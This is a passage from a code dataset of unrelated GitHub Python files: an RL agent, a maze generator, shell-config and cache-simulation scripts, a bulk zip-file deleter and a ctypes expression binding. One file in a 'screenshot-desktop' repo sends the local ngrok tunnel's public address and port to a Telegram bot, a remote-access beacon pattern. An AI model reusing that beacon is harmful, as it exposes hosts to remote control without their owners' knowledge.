escape_shell_arg(arg):\n return \"\\\\'\".join(\"'\" + p + \"'\" for p in arg.split(\"'\"))\n","repo_name":"youpengfei/eve","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20287642303","text":"from torch.utils.tensorboard import SummaryWriter\n\n\ndef episode(env, agent):\n writer = SummaryWriter()\n\n num_episodes = 1000\n for i in range(num_episodes):\n state = env.reset()\n total_reward = 0\n while True:\n env.render()\n action = agent.step()\n next_state, reward, done, info = env.step(action)\n total_reward += reward\n state = next_state\n\n if done:\n break\n\n writer.add_scalar('reward', total_reward, 
global_step=i)\n\n\nclass RandomAgent:\n def __init__(self, action_space, observation_space):\n self.action_space = action_space\n self.observation_space = observation_space\n self.num_actions = action_space.n\n\n def step(self):\n return self.action_space.sample()\n","repo_name":"andrijazz/learn","sub_path":"rl_ua/code/lunar_lander/random_agent.py","file_name":"random_agent.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27783370267","text":"import pygame\nimport huntandkill\nimport growingtree\nimport binarytree\nimport grid\nimport solver\nimport window\n\n# Screen and grid constants\nWIDTH = 800\nROWS = 10\nCOLS = ROWS\n\nYELLOW = (255, 255, 0)\n\n## Main\ndef main():\n surface = window.init_surface(WIDTH)\n g = grid.Grid(ROWS, COLS, WIDTH)\n\n start = None\n end = None\n\n running = True\n while running:\n window.draw(surface, g.grid)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # Check left mouse button\n if pygame.mouse.get_pressed()[0]:\n pos = pygame.mouse.get_pos()\n row, col = window.get_clicked_pos(pos, WIDTH, ROWS)\n cell = g.grid[row][col]\n\n if not start and cell != end:\n start = cell\n start.set_start()\n\n elif not end and cell != start:\n end = cell\n end.set_end()\n\n elif cell != start and cell != end:\n cell.color = YELLOW\n\n # Check right mouse button\n elif pygame.mouse.get_pressed()[2]:\n pos = pygame.mouse.get_pos()\n row, col = window.get_clicked_pos(pos, WIDTH, ROWS)\n cell = g.grid[row][col]\n cell.reset()\n if cell == start:\n start = None\n\n elif cell == end:\n end = None\n\n if event.type == pygame.KEYDOWN:\n # 'C' will reset the grid\n if event.key == pygame.K_c:\n g = grid.Grid(ROWS, COLS, WIDTH)\n\n # 'H' will generate a new maze using the hunt and kill algorithm\n if event.key == pygame.K_h:\n start = None\n end = None\n g = grid.Grid(ROWS, COLS, WIDTH)\n huntandkill.generate(surface, g, True)\n\n # 'B' will generate a new maze using the growing tree algorithm in backtrack mode\n if event.key == pygame.K_b:\n start = None\n end = None\n g = grid.Grid(ROWS, COLS, WIDTH)\n growingtree.generate(surface, g, \"Backtrack\", True)\n\n # 'P' will generate a new maze using the growing tree algorithm in random (Prim's) mode\n if event.key == pygame.K_p:\n start = None\n end = None\n g = grid.Grid(ROWS, COLS, WIDTH)\n growingtree.generate(surface, g, \"Random\", True)\n\n # 'T' will generate a new maze using the binary tree algorithm\n # Available modes are NE, NW, SE, and SW\n if event.key == pygame.K_t:\n start = None\n end = None\n g = grid.Grid(ROWS, COLS, WIDTH)\n binarytree.generate(surface, g, \"NE\", True)\n\n # 'R' will reset the maze (remove solution)\n if event.key == pygame.K_r:\n for row in g.grid:\n for cell in row:\n if cell == start:\n cell.set_start()\n elif cell == end:\n cell.set_end()\n else:\n cell.reset()\n\n # Run A* algorithm to find the shortest path between start and end\n if event.key == pygame.K_SPACE and start != None and end != None:\n for row in g.grid:\n for cell in row:\n cell.update_accessible_neighbors(g.grid)\n solver.run_astar_algo(lambda: window.draw(surface, g.grid), g.grid, start, end, False)\n\n\n pygame.quit()\n\n\n\nmain()\n","repo_name":"sabah-z-ahmad/maze-generator","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"25763045842","text":"import requests\n\n\n\ndef ngrok_send_Telegram():\n try:\n json_request = requests.get(\"http://127.0.0.1:4040/api/tunnels\")\n url = json_request.json()\n ngrok_url= url[\"tunnels\"][0][\"public_url\"].split(\":\")[1].split(\"//\")[1]\n ngrok_port = url[\"tunnels\"][0][\"public_url\"].split(\":\")[2]\n\n\n message = \"\\n Take your Ip and Port\\nIp\\n==> {}\\nPort\\n==> {}\".format(ngrok_url, ngrok_port)\n url = f\"https://api.telegram.org/bot{token}/sendMessage?chat_id={id}&text={message}\"\n requests.get(url)\n return \"Good\"\n except:\n return \"Invalid\"\n \n#ngrok_send_Telegram()","repo_name":"Zud0k4t0-SkyDark/screenshot-desktop","sub_path":"settings_packages/comand.py","file_name":"comand.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74843878866","text":"import shutil\nimport sys\nimport os\n\ninfile = os.path.join(os.environ.get('HOME'), '.zshrc')\nif not os.path.exists(infile):\n print(f\"file '{infile}' does not exist\")\n sys.exit(1)\n\nbakfile = f\"{infile }.bak\"\nprint(f\"Will attempt to move '{infile}' to '{bakfile}'\")\n\nos.rename(infile, bakfile)\n\nof = open(infile, 'w')\n\nprint(f\"Will attempt to update the plugins section in '{infile}'\")\n\nwith open(bakfile, 'r') as f:\n for line in f:\n if line.startswith('plugins=(git)'):\n line = 'plugins=(git zsh-syntax-highlighting zsh-autosuggestions)'\n of.write(line)\n\nof.close()\n\nprint(f\"Please execute:\\nsource {infile}\")\n","repo_name":"clinbioinfo/dev-utils","sub_path":"util/update_oh_my_zsh_plugins.py","file_name":"update_oh_my_zsh_plugins.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17235950281","text":"import os\nimport logging\nfrom pathlib import Path\nfrom shutil import unpack_archive\n\nzip_files = Path(r\"D:\\ProjectData\").rglob(\"*.zip\")\nwhile True:\n try:\n path = next(zip_files)\n except StopIteration:\n break # no more files\n except PermissionError:\n logging.exception(\"permission error\")\n else:\n os.remove(path)\n","repo_name":"adsarode/PythonExperiments","sub_path":"Utils/DeleteAllZipFilesInSubDirs.py","file_name":"DeleteAllZipFilesInSubDirs.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12192958722","text":"import yt\nimport os\nfrom pvuLoder import pvuFile\nimport numpy as np\n\n# set the file path \nDataDir=os.path.join(os.environ.get('ASPECTdatadir','./'),'fault_formation')\npFile=os.path.join(DataDir,'solution-00050.pvtu')\nif os.path.isfile(pFile) is False:\n print(f\"data file not found: {pFile}\")\n\n# instantiate our manual pvu loader and load into memory (takes a while!)\npvuData=pvuFile(pFile)\npvuData.load()\n\n# create the yt dataset\nds = yt.load_unstructured_mesh(\n pvuData.connectivity,\n pvuData.coordinates,\n node_data = pvuData.node_data,\n length_unit=\"m\"\n)\n\n# create a couple slices in strain rate: \nsr_cmap = 'magma'\n\nslc = yt.SlicePlot(ds,'x',('all','strain_rate'))\nslc.set_log('strain_rate',True)\nslc.set_cmap(('all','strain_rate'),sr_cmap)\nslc.hide_axes()\nslc.save('../figures/aspect_fault_xsec.png')\n\nc_val = ds.domain_center\nc_arr = np.array([c_val[0],c_val[1],ds.domain_width[2]*0.8])\nslc = 
yt.SlicePlot(ds,'z',('all','strain_rate'),center=c_arr)\nslc.set_log('strain_rate',True)\nslc.set_cmap(('all','strain_rate'),sr_cmap)\nslc.hide_axes()\nslc.save('../figures/aspect_fault_map.png')\n","repo_name":"chrishavlin/AGU2020","sub_path":"code/aspect_high_res.py","file_name":"aspect_high_res.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30561446322","text":"import subprocess \n\ncache_line = 1024\nblock_size = 8\n\ncache_line_counter = 0\nblock_size_counter = 0\nfor cache_line_counter in range(0,8):\n\tfor block_size_counter in range (0,4):\n\t\tp1 = subprocess.run(f'./sim-cache -cache:il1 il1:256:32:1:l -cache:dl1 dl1:{cache_line}:{block_size}:1:l -cache:il2 dl2 -cache:dl2 ul2:1024:64:4:l ./benchmarks/whetstone',shell =True, stderr = subprocess.PIPE)\n\t\tx= p1.stderr.decode().find('dl1.miss_rate ')\n\t\t#print (\"x = \t\t\t\",p1.stderr.decode()[x:x+100])\n\t\tprint('-------->',cache_line,' ',block_size,' ',p1.stderr.decode()[x:x+35])\n\t\tblock_size = 2*block_size\n\tblock_size = 8\n\n\t\n\tcache_line = 2*cache_line\n\n\t\n\n","repo_name":"mahmoudhassanhamza/PythonScriptForLinux","sub_path":"commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12071319675","text":"#!/usr/bin/env python3\nfrom base import *\nimport time\nimport random\nrandom.seed()\n\nfor e in mongodb[\"events\"].find({\"time\":{\"$lte\":time.time()},\"sent\":{\"$exists\":False}}):\n tpls = list(mongodb[\"templates\"].find({\"type\":e[\"type\"]}))\n if len(tpls) > 0:\n msg = random.choice(tpls)[\"msg\"].format_map(e)\n print(msg)\n mongodb[\"events\"].update({\"_id\":e[\"_id\"]},{\"$set\":{\"sent\":time.time()}})\n else:\n print(\"No template of type %s found.\" % e[\"type\"])\n","repo_name":"Freifunk-Potsdam/ffp-monitor","sub_path":"sendmsg.py","file_name":"sendmsg.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"26784368905","text":"import ctypes as ct\nfrom . 
import libcconfigspace\nfrom .base import Object, Error, Result, CEnumeration, _ccs_get_function, ccs_expression, Datum, DatumFix, ccs_parameter, ccs_context\nfrom .parameter import Parameter\n\nclass ExpressionType(CEnumeration):\n _members_ = [\n ('OR', 0),\n 'AND',\n 'EQUAL',\n 'NOT_EQUAL',\n 'LESS',\n 'GREATER',\n 'LESS_OR_EQUAL',\n 'GREATER_OR_EQUAL',\n 'ADD',\n 'SUBSTRACT',\n 'MULTIPLY',\n 'DIVIDE', \n 'MODULO', \n 'POSITIVE',\n 'NEGATIVE',\n 'NOT',\n 'IN',\n 'LIST',\n 'LITERAL',\n 'VARIABLE' ]\n\nclass AssociativityType(CEnumeration):\n _members_ = [\n ('ASSOCIATIVITY_NONE', 0),\n 'LEFT_TO_RIGHT',\n 'RIGHT_TO_LEFT' ]\n\n_sz_expr = len(ExpressionType._members_)\nccs_expression_precedence = (ct.c_int * _sz_expr).in_dll(libcconfigspace, \"ccs_expression_precedence\")\nccs_expression_associativity = (AssociativityType * _sz_expr).in_dll(libcconfigspace, \"ccs_expression_associativity\")\nccs_expression_symbols = [x.decode() if x else x for x in (ct.c_char_p * _sz_expr).in_dll(libcconfigspace, \"ccs_expression_symbols\")]\nccs_expression_arity = (ct.c_int * _sz_expr).in_dll(libcconfigspace, \"ccs_expression_arity\")\n\nclass TerminalType(CEnumeration):\n _members_ = [\n ('NONE', 0),\n 'TRUE',\n 'FALSE',\n 'STRING',\n 'IDENTIFIER',\n 'INTEGER',\n 'FLOAT' ]\n\n_sz_term = len(TerminalType._members_)\nccs_terminal_precedence = (ct.c_int * _sz_term).in_dll(libcconfigspace, \"ccs_terminal_precedence\")\nccs_terminal_regexp = [x.decode() if x else x for x in (ct.c_char_p * _sz_term).in_dll(libcconfigspace, \"ccs_terminal_regexp\")]\nccs_terminal_symbols = [x.decode() if x else x for x in (ct.c_char_p * _sz_term).in_dll(libcconfigspace, \"ccs_terminal_symbols\")]\n\nccs_create_binary_expression = _ccs_get_function(\"ccs_create_binary_expression\", [ExpressionType, DatumFix, DatumFix, ct.POINTER(ccs_expression)])\nccs_create_unary_expression = _ccs_get_function(\"ccs_create_unary_expression\", [ExpressionType, DatumFix, ct.POINTER(ccs_expression)])\nccs_create_expression = _ccs_get_function(\"ccs_create_expression\", [ExpressionType, ct.c_size_t, ct.POINTER(Datum), ct.POINTER(ccs_expression)])\nccs_create_literal = _ccs_get_function(\"ccs_create_literal\", [DatumFix, ct.POINTER(ccs_expression)])\nccs_create_variable = _ccs_get_function(\"ccs_create_variable\", [ccs_parameter, ct.POINTER(ccs_expression)])\nccs_expression_get_type = _ccs_get_function(\"ccs_expression_get_type\", [ccs_expression, ct.POINTER(ExpressionType)])\nccs_expression_get_num_nodes = _ccs_get_function(\"ccs_expression_get_num_nodes\", [ccs_expression, ct.POINTER(ct.c_size_t)])\nccs_expression_get_nodes = _ccs_get_function(\"ccs_expression_get_nodes\", [ccs_expression, ct.c_size_t, ct.POINTER(ccs_expression), ct.POINTER(ct.c_size_t)])\nccs_literal_get_value = _ccs_get_function(\"ccs_literal_get_value\", [ccs_expression, ct.POINTER(Datum)])\nccs_variable_get_parameter = _ccs_get_function(\"ccs_variable_get_parameter\", [ccs_expression, ct.POINTER(ccs_parameter)])\nccs_expression_eval = _ccs_get_function(\"ccs_expression_eval\", [ccs_expression, ccs_context, ct.POINTER(Datum), ct.POINTER(Datum)])\nccs_expression_list_eval_node = _ccs_get_function(\"ccs_expression_list_eval_node\", [ccs_expression, ccs_context, ct.POINTER(Datum), ct.c_size_t, ct.POINTER(Datum)])\nccs_expression_get_parameters = _ccs_get_function(\"ccs_expression_get_parameters\", [ccs_expression, ct.c_size_t, ct.POINTER(ccs_parameter), ct.POINTER(ct.c_size_t)])\nccs_expression_check_context = _ccs_get_function(\"ccs_expression_check_context\", [ccs_expression, 
ccs_context])\n\nclass Expression(Object):\n\n @classmethod\n def from_handle(cls, handle, retain = True, auto_release = True):\n v = ExpressionType(0)\n res = ccs_expression_get_type(handle, ct.byref(v))\n Error.check(res)\n v = v.value\n klass = cls.EXPRESSION_MAP[v]\n if klass is None:\n raise Error(Result(Result.ERROR_INVALID_EXPRESSION))\n return klass(handle = handle, retain = retain, auto_release = auto_release)\n\n def _create_binary(self, t, left, right):\n pvleft = Datum(left)\n pvright = Datum(right)\n vleft = DatumFix(pvleft)\n vright = DatumFix(pvright)\n handle = ccs_expression()\n res = ccs_create_binary_expression(t, vleft, vright, ct.byref(handle))\n Error.check(res)\n return handle\n\n def _create_unary(self, t, node):\n pvnode = Datum(node)\n vnode = DatumFix(pvnode)\n handle = ccs_expression()\n res = ccs_create_unary_expression(t, vnode, ct.byref(handle))\n Error.check(res)\n return handle\n\n @property\n def type(self):\n if hasattr(self, \"_type\"):\n return self._type\n v = ExpressionType(0)\n res = ccs_expression_get_type(self.handle, ct.byref(v))\n Error.check(res)\n self._type = v.value\n return self._type\n\n @property\n def num_nodes(self):\n if hasattr(self, \"_num_nodes\"):\n return self._num_nodes\n v = ct.c_size_t(0)\n res = ccs_expression_get_num_nodes(self.handle, ct.byref(v))\n Error.check(res)\n self._num_nodes = v.value\n return self._num_nodes\n\n @property\n def nodes(self):\n if hasattr(self, \"_nodes\"):\n return self._nodes\n sz = self.num_nodes\n v = (ccs_expression * sz)()\n res = ccs_expression_get_nodes(self.handle, sz, v, None)\n Error.check(res)\n self._nodes = [Expression.from_handle(handle = ccs_expression(x)) for x in v]\n return self._nodes\n\n @property\n def parameters(self):\n if hasattr(self, \"_parameters\"):\n return self._parameters\n sz = ct.c_size_t()\n res = ccs_expression_get_parameters(self.handle, 0, None, ct.byref(sz))\n Error.check(res)\n sz = sz.value\n if sz == 0:\n self._parameters = []\n return []\n v = (ccs_parameter * sz.value)()\n res = ccs_expression_get_parameters(self.handle, sz, v, None)\n Error.check(res)\n self._parameters = [Parameter.from_handle(ccs_parameter(x)) for x in v]\n return self._parameters\n\n def eval(self, context = None, values = None):\n if context and values:\n count = context.num_parameters\n if count != len(values):\n raise Error(Result(Result.ERROR_INVALID_VALUE))\n v = (Datum * count)()\n ss = []\n for i in range(count):\n v[i].set_value(values[i], string_store = ss)\n values = v\n context = context.handle\n elif context or values:\n raise Error(Result(Result.ERROR_INVALID_VALUE))\n v = Datum()\n res = ccs_expression_eval(self.handle, context, values, ct.byref(v))\n Error.check(res)\n return v.value\n\n def check_context(self, context):\n res = ccs_expression_check_context(self.handle, context.handle)\n Error.check(res)\n\n def __str__(self):\n t = self.type\n symbol = ccs_expression_symbols[t]\n prec = ccs_expression_precedence[t]\n nds = [\"({})\".format(n) if ccs_expression_precedence[n.type] < prec else n.__str__() for n in self.nodes]\n if len(nds) == 1:\n return \"{}{}\".format(symbol, nds[0])\n else:\n return \"{} {} {}\".format(nds[0], symbol, nds[1])\n\nclass ExpressionOr(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.OR, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = 
retain, auto_release = auto_release)\n\nExpression.Or = ExpressionOr\n\nclass ExpressionAnd(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.AND, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.And = ExpressionAnd\n\nclass ExpressionEqual(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.EQUAL, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Equal = ExpressionEqual\n\nclass ExpressionNotEqual(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.NOT_EQUAL, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.NotEqual = ExpressionNotEqual\n\nclass ExpressionLess(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.LESS, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Less = ExpressionLess\n\nclass ExpressionGreater(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.GREATER, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Greater = ExpressionGreater\n\nclass ExpressionLessOrEqual(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.LESS_OR_EQUAL, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.LessOrEqual = ExpressionLessOrEqual\n\nclass ExpressionGreaterOrEqual(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.GREATER_OR_EQUAL, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.GreaterOrEqual = ExpressionGreaterOrEqual\n\nclass ExpressionAdd(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.ADD, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Add = ExpressionAdd\n\nclass ExpressionSubstract(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = 
None):\n if handle is None:\n handle = self._create_binary(ExpressionType.SUBSTRACT, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Substract = ExpressionSubstract\n\nclass ExpressionMultiply(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.MULTIPLY, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Multiply = ExpressionMultiply\n\nclass ExpressionDivide(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.DIVIDE, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Divide = ExpressionDivide\n\nclass ExpressionModulo(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.MODULO, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Modulo = ExpressionModulo\n\nclass ExpressionPositive(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n node = None):\n if handle is None:\n handle = self._create_unary(ExpressionType.POSITIVE, node)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Positive = ExpressionPositive\n\nclass ExpressionNegative(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n node = None):\n if handle is None:\n handle = self._create_unary(ExpressionType.NEGATIVE, node)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Negative = ExpressionNegative\n\nclass ExpressionNot(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n node = None):\n if handle is None:\n handle = self._create_unary(ExpressionType.NOT, node)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Not = ExpressionNot\n\nclass ExpressionIn(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.IN, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.In = ExpressionIn\n\nclass ExpressionLiteral(Expression):\n none_symbol = ccs_terminal_symbols[TerminalType.NONE]\n true_aymbol = ccs_terminal_symbols[TerminalType.TRUE]\n false_symbol = ccs_terminal_symbols[TerminalType.FALSE]\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n value = None):\n if handle is None:\n handle = ccs_expression()\n pv = Datum(value)\n v = DatumFix(pv)\n res = ccs_create_literal(v, ct.byref(handle))\n 
Error.check(res)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n \n @property \n def value(self):\n if hasattr(self, \"_value\"):\n return self._value\n v = Datum()\n res = ccs_literal_get_value(self.handle, ct.byref(v))\n Error.check(res)\n self._value = v.value\n return self._value\n \n def __str__(self):\n v = self.value\n if isinstance(v, str):\n return repr(v)\n elif v is None:\n return ExpressionLiteral.none_symbol\n elif v is True:\n return ExpressionLiteral.true_aymbol\n elif v is False:\n return ExpressionLiteral.false_symbol\n else:\n return \"{}\".format(v)\n\nExpression.Literal = ExpressionLiteral\n\nclass ExpressionVariable(Expression):\n def __init__(self, handle = None, retain = False, auto_release = True,\n parameter = None):\n if handle is None:\n handle = ccs_expression()\n res = ccs_create_variable(parameter.handle, ct.byref(handle))\n Error.check(res)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n \n @property \n def parameter(self):\n if hasattr(self, \"_parameter\"):\n return self._parameter\n v = ccs_parameter()\n res = ccs_variable_get_parameter(self.handle, ct.byref(v))\n Error.check(res)\n self._parameter = Parameter.from_handle(v)\n return self._parameter\n \n def __str__(self):\n return self.parameter.name\n\nExpression.Variable = ExpressionVariable\n\nclass ExpressionList(Expression):\n def __init__(self, handle = None, retain = False, auto_release = True,\n values = []):\n if handle is None:\n sz = len(values)\n handle = ccs_expression()\n v = (Datum*sz)()\n ss = []\n for i in range(sz):\n v[i].set_value(values[i], string_store = ss)\n res = ccs_create_expression(ExpressionType.LIST, sz, v, ct.byref(handle))\n Error.check(res)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n \n def eval(self, index, context = None, values = None):\n if context and values:\n count = context.num_parameters\n if count != len(values):\n raise Error(Result(Result.ERROR_INVALID_VALUE))\n v = (Datum * count)()\n ss = []\n for i in range(count):\n v[i].set_value(values[i], string_store = ss)\n values = v\n context = context.handle\n elif context or values:\n raise Error(Result(Result.ERROR_INVALID_VALUE))\n v = Datum()\n res = ccs_expression_list_eval_node(self.handle, context, values, index, ct.byref(v))\n Error.check(res)\n return v.value\n\n def __str__(self):\n return \"[ {} ]\".format(\", \".join(map(str, self.nodes)))\n\nExpression.List = ExpressionList\n\nsetattr(Expression, 'EXPRESSION_MAP', {\n ExpressionType.OR: ExpressionOr,\n ExpressionType.AND: ExpressionAnd,\n ExpressionType.EQUAL: ExpressionEqual,\n ExpressionType.NOT_EQUAL: ExpressionNotEqual,\n ExpressionType.LESS: ExpressionLess,\n ExpressionType.GREATER: ExpressionGreater,\n ExpressionType.LESS_OR_EQUAL: ExpressionLessOrEqual,\n ExpressionType.GREATER_OR_EQUAL: ExpressionGreaterOrEqual,\n ExpressionType.ADD: ExpressionAdd,\n ExpressionType.SUBSTRACT: ExpressionSubstract,\n ExpressionType.MULTIPLY: ExpressionMultiply,\n ExpressionType.DIVIDE: ExpressionDivide,\n ExpressionType.MODULO: ExpressionModulo,\n ExpressionType.POSITIVE: ExpressionPositive,\n ExpressionType.NEGATIVE: ExpressionNegative,\n ExpressionType.NOT: ExpressionNot,\n ExpressionType.IN: ExpressionIn,\n ExpressionType.LIST: ExpressionList,\n ExpressionType.LITERAL: 
ExpressionLiteral,\n ExpressionType.VARIABLE: ExpressionVariable,\n})\n","repo_name":"argonne-lcf/CCS","sub_path":"bindings/python/cconfigspace/expression.py","file_name":"expression.py","file_ext":"py","file_size_in_byte":18666,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"24143329510","text":"from typing import Optional, TypeVar, Union, Type\r\n\r\nimport numpy as np\r\nfrom numpy.typing import NDArray\r\n\r\nfrom ..config import Config\r\nfrom .math_relation import Relation\r\nfrom .defaults.base_structures import ConvertingError\r\n\r\n\r\nNum = Union[float, int, complex]\r\nR = TypeVar(\"R\", bound=Relation)\r\nSP = TypeVar(\"SP\", bound=\"Spectrum\")\r\nS = TypeVar(\"S\", bound=\"Signal\")\r\nSPRN = Union[\"Spectrum\", \"Relation\", Num]\r\nSSPR = Union[\"Spectrum\", \"Signal\", \"Relation\"]\r\nSSPRN = Union[\"Spectrum\", \"Signal\", \"Relation\", Num]\r\n\r\n\r\ndef _input2spectrum_operation(inp: SSPRN) -> Union[\"Relation\", \"Spectrum\", Num]:\r\n if isinstance(inp, Signal):\r\n return inp.get_spectrum()\r\n elif isinstance(inp, (Spectrum, Relation, int, float, complex)):\r\n return inp\r\n else:\r\n raise ConvertingError(type(inp), Spectrum)\r\n\r\n\r\ndef _input2spectrum(inp: SSPR) -> \"Spectrum\":\r\n if isinstance(inp, Signal):\r\n return inp.get_spectrum()\r\n\r\n elif isinstance(inp, Spectrum):\r\n return inp\r\n\r\n elif isinstance(inp, Relation):\r\n return Spectrum(inp)\r\n else:\r\n raise ConvertingError(type(inp), Spectrum)\r\n\r\n\r\nclass Spectrum(Relation):\r\n \"\"\"A class that describes the Fourier spectrum of a signal.\r\n\r\n The `Spectrun` class derived from the `Relation` class.\r\n\r\n **Properties**:\r\n\r\n > **frequency**: `Union[Relation, NDArray]`\r\n An instance of Relation class or inherited from it, or array_like object\r\n containing numbers (real or complex).\r\n\r\n > **spectrum_amplitude**: `Oprional[NDArray]`\r\n None or array_like object containing numbers (real or complex).\r\n\r\n > **df**: `float` = `None`\r\n Sample rate of frequency-axis\r\n\r\n To convert the spectrum into a signal, the method defined in the Config\r\n class is used. (Config.spectrum2signal_method). Current method can be\r\n overridden by own in `Config` class.\r\n\r\n When performing arithmetic operations on instances of the `Signal` class,\r\n an instance of the `Spectrum` class will be extracted from\r\n the `Signal` instance, and arithmetic operations will be performed\r\n on this instance. 
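The expression.py record above hand-writes a dozen near-identical binary/unary `Expression` subclasses and attaches each to the base class. A standalone sketch of how a small class factory could generate that boilerplate — `ExpressionType`, `Expression`, and the tuple returned by `_create_binary` below are simplified stand-ins, not the real CCS ctypes API:

```python
from enum import Enum, auto

class ExpressionType(Enum):
    ADD = auto()
    MULTIPLY = auto()

class Expression:
    def __init__(self, handle=None):
        self.handle = handle

    @staticmethod
    def _create_binary(expr_type, left, right):
        # stand-in for the real ctypes call that returns a ccs_expression handle
        return (expr_type, left, right)

def make_binary(name, expr_type):
    """Generate an Expression subclass whose __init__ wraps _create_binary."""
    def __init__(self, handle=None, left=None, right=None):
        if handle is None:
            handle = self._create_binary(expr_type, left, right)
        Expression.__init__(self, handle=handle)
    cls = type(name, (Expression,), {"__init__": __init__})
    # mirror the `Expression.Add = ExpressionAdd` pattern used in the record
    setattr(Expression, name.replace("Expression", ""), cls)
    return cls

ExpressionAdd = make_binary("ExpressionAdd", ExpressionType.ADD)
ExpressionMultiply = make_binary("ExpressionMultiply", ExpressionType.MULTIPLY)

print(Expression.Add(left=1, right=2).handle)  # (ExpressionType.ADD, 1, 2)
```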
